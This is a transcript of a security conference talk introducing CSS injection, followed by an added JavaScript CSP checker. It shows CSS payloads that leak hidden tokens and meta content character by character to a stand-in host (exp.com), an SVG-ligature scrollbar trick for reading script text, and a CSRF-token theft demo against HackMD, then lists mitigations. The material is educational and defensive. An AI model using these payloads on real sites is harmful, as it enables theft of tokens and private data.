
Attacking web without JS - CSS injection

Huli
September 22, 2022

When speaking of front-end web security, XSS is the first thing that comes to mind. But even without JavaScript, an attacker can still use other attack vectors such as HTML injection and CSS injection! This talk is an introduction to CSS injection.

Transcript

  1. Attacking web without JS - CSS Injection. Huli from Cymetrics / OneInfinity @ CYBERSEC 2022
  2. About Huli
     • Security Researcher at Cymetrics / OneInfinity
     • CTF player at Water Paddler
     • https://blog.huli.tw/
  3. Front-end Security
  4. Front-end Security => XSS (Cross-Site Scripting)
  5. Front-end Security => XSS (Cross-Site Scripting)
  6. IE7 (15 years ago)
     <p style=" x:expression(alert(1)) ">
  7. CSS injection => Steal data via CSS
  8. CSS injection => Steal data via CSS. How?
  9. input[value^="a"] { background: url("//exp.com?a"); }
  10. CSS selectors
      input[value^="a"]  // prefix
      input[value$="a"]  // suffix
      input[value*="a"]  // contains
  11. Steal input value
      <form>
        <input type=hidden name=token value=abc123>
        <input name="action" value="update">
        <input type="submit">
      </form>
  12. Steal input value
      <form>
        <input type=hidden name=token value=abc123>
        <input name="action" value="update">
        <input type="submit">
      </form>
      input[value^="a"] { background: url("//exp.com?a"); }
  13. Steal input value
      <form>
        <input type=hidden name=token value=abc123>
        <input name="action" value="update">
        <input type="submit">
      </form>
      input[value^="a"] + input { background: url("//exp.com?a"); }
  14. Steal input value
      <form>
        <input name="action" value="update">
        <input type="submit">
        <input type=hidden name=token value=abc123>
      </form>
  15. :has() to the rescue
      <form>
        <input name="action" value="update">
        <input type="submit">
        <input type=hidden name=token value=abc123>
      </form>
      form:has(input[value^="a"]) { background: url("//exp.com?a"); }
  16. None
  17. Steal meta content
      <head> <meta name=token content=abc123> </head>
  18. Steal meta content
      <head> <meta name=token content=abc123> </head>
      meta[content^="a"] { background: url(//exp.com?a); }
  19. Steal meta content
      <head> <meta name=token content=abc123> </head>
      meta[content^="a"] { background: url(//exp.com?a); }
  20. Steal meta content
      <head> <meta name=token content=abc123> </head>
      meta { display: block; }
      meta[content^="a"] { background: url(//exp.com?a); }
  21. Steal meta content
      <head> <meta name=token content=abc123> </head>
      meta { display: block; }
      meta[content^="a"] { background: url(//exp.com?a); }
  22. Steal meta content
      <head> <meta name=token content=abc123> </head>
      meta[content^="a"] { background: url(//exp.com?a); }
  23. Steal meta content
      <head> <meta name=token content=abc123> </head>
      meta, head { display: block; }
      meta[content^="a"] { background: url(//exp.com?a); }
  24. None
  25. None
  26. Steal HackMD CSRF token
  27. Steal HackMD CSRF token
  28. Steal HackMD CSRF token / HackMD Server
  29. Steal HackMD CSRF token / HackMD Server / server?token=a
  30. Steal HackMD CSRF token / HackMD Server / server?token=a / Update content and <style>
  31. Steal HackMD CSRF token / HackMD Server / server?token=ab / Update content and <style>
  32. Demo

  33. Steal CSRF token != CSRF 😢

  34. Steal any content
      <script> var secret = "abc123"; </script>
      Is it possible?
  35. Ligature: https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg
  36. Ligature
      <svg>
        <defs>
          <font horiz-adv-x="0">
            <font-face font-family="leak" units-per-em="1000" />
            <glyph unicode="&quot;a" horiz-adv-x="10000" d="M1 0z"/>
          </font>
        </defs>
      </svg>
  37. Ligature + scroll bar
      script { width: 300px; display: block; font-family: "leak"; white-space: nowrap; overflow-x: auto; }
      script::-webkit-scrollbar { background: blue; }
      script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }
  38. Ligature + scroll bar
  39. Mitigation
      • Sanitization
      • Content Security Policy
        • style-src
        • font-src
      • Check origin/referer header
      • Same-site cookie
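Of the mitigations above, CSP is the one that can be checked mechanically. The following is an added example, not part of Huli's deck, that evaluates which directive governs each request the deck's payloads make: the `background: url(//exp.com?a)` fetch is an image load (img-src), the ligature font is a font load (font-src), and an injected `<style>` block only applies when style-src permits inline styles. It assumes a constructed victim origin and a simplified subset of CSP source matching (no ports, nonces, hashes or redirects).

```javascript
// Added example (not from the talk): a simplified CSP evaluator showing which
// directive governs each fetch a CSS-injection payload triggers. Assumptions:
// constructed victim origin; 'self', scheme:, host and *.host sources only;
// ports, nonces, hashes and redirects are not modelled.
const PAGE_ORIGIN = 'https://app.example.com';

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

function sourceMatches(expr, url, pageOrigin) {
  const e = expr.toLowerCase();
  if (e === "'self'") return url.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return url.protocol === e;   // scheme source, e.g. https:
  if (e.startsWith("'")) return false;   // 'none', 'unsafe-inline', nonces, hashes never match a URL
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/]+)(?::(?:\d+|\*))?$/);  // host source
  if (!m) return false;
  const [, scheme, wild, host] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  return wild ? url.hostname.endsWith('.' + host) : url.hostname === host;
}

// Is a fetch of `ref` (as written in the CSS) allowed under this fetch directive?
// A missing directive falls back to default-src; no applicable directive means allowed.
function cspAllows(header, directive, ref, pageOrigin = PAGE_ORIGIN) {
  const policy = parseCsp(header);
  const sources = policy[directive] ?? policy['default-src'];
  if (!sources) return true;
  const url = new URL(ref, pageOrigin + '/');   // "//exp.com?a" resolves to https://exp.com/?a
  return sources.some(s => sourceMatches(s, url, pageOrigin));
}
// Does the policy let an injected inline <style> block apply at all?
function inlineStyleAllowed(header) {
  const policy = parseCsp(header);
  const sources = policy['style-src'] ?? policy['default-src'];
  return !sources || sources.some(s => s.toLowerCase() === "'unsafe-inline'");
}
// Weak but common: inline styles allowed, nothing said about images, so the
// background: url(//exp.com?a) request triggered by the selector leaves the page.
const WEAK = "style-src 'self' 'unsafe-inline'";
// Hardened: injected <style> is refused, and image and font fetches stay on the page's origin.
const HARDENED = "default-src 'self'; style-src 'self'; img-src 'self'; font-src 'self'";
console.log(inlineStyleAllowed(WEAK), cspAllows(WEAK, 'img-src', '//exp.com?a'));          // true true
console.log(inlineStyleAllowed(HARDENED), cspAllows(HARDENED, 'img-src', '//exp.com?a'));  // false false
```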
  40. Reference
      1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf
      2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
      3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
      4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack-web-application/
      5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html
      6. https://github.com/masatokinugawa/css-exfiltration-svg-font/
  41. Q&A